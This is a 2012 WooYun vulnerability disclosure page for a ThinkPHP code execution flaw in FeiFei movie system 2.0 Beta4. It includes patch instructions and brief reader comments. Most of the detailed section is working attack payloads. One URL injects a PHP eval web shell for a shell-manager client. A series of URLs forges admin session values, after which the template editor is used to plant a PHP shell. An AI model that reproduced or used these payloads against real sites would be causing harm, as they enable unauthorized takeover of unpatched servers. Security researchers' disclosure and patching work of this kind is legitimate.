当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010518

漏洞标题:飞飞影视系统 2.0.120220(Beta4)版 thinkphp任意代码执行漏洞利用

相关厂商:飞飞电影程序v2.0

漏洞作者: 小猪。

提交时间:2012-08-03 11:46

修复时间:2012-09-17 11:46

公开时间:2012-09-17 11:46

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看了乌云的Thinkphp 任意执行,测试下了,飞飞最新版本的。飞飞影视系统 2.0.120220(Beta4)版,说一下利用方法。

详细说明:

第一个方法 直接执行
http://www.testtest.com/index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html
直接拿菜刀连接。


第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边三条。
在地址栏直接输入
index.php?s=vod-search-area-${@$_SESSION[AdminLogin]=1}.html

index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html

index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html

执行完毕登录后台。
直接地址栏输入
index.php?s=admin-index
index.php?s=Admin-Index-Top
index.php?s=Admin-Index-Top
s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-.|Tpl|default

拿shell,模版管理,随便点击一个模版,然后点编辑,然后输入路径,把名字改成xx.php写上一句话。

漏洞证明:


修复方案:

该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。
影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。
下载地址:http://thinkphp.cn/download-116.html
修正方法:
首先解压缩安全补丁文件。
2.1和2.2版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件
3.0版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件
替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件

版权声明:转载请注明来源 小猪。@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-08-03 13:18 | 腰上有胸器 ( 路人 | Rank:11 漏洞数:5 | 一根带刺的黄瓜和一个女人的故事。)

    关注.

  2. 2012-08-04 15:43 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    被你这么一宣传,这个站似乎要被很多人轮了。。。

  3. 2012-08-04 20:04 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    关注一下。。。。

  4. 2012-08-09 17:25 | Vi0lent ( 普通白帽子 | Rank:131 漏洞数:14 | hello~)

    @小猪。...

  5. 2012-08-09 23:45 | 小猪。 ( 路人 | Rank:6 漏洞数:3 | 小猪。)

    @Vi0lent 神马。。

  6. 2012-08-09 23:45 | 小猪。 ( 路人 | Rank:6 漏洞数:3 | 小猪。)

    @风萧萧 我Q好想有你啊,你是哪个风萧萧。

  7. 2012-09-17 12:56 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    黑阔啊,大黑阔啊,好详细

  8. 2012-09-17 16:30 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

    大黑客影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序

  9. 2012-09-17 16:39 | 木易木兆 ( 路人 | Rank:30 漏洞数:4 | 烧死异性恋!!!!!!!!!)

    貌似中枪率不是那么高,而且通过这个拿到的一些站权限很有限。。。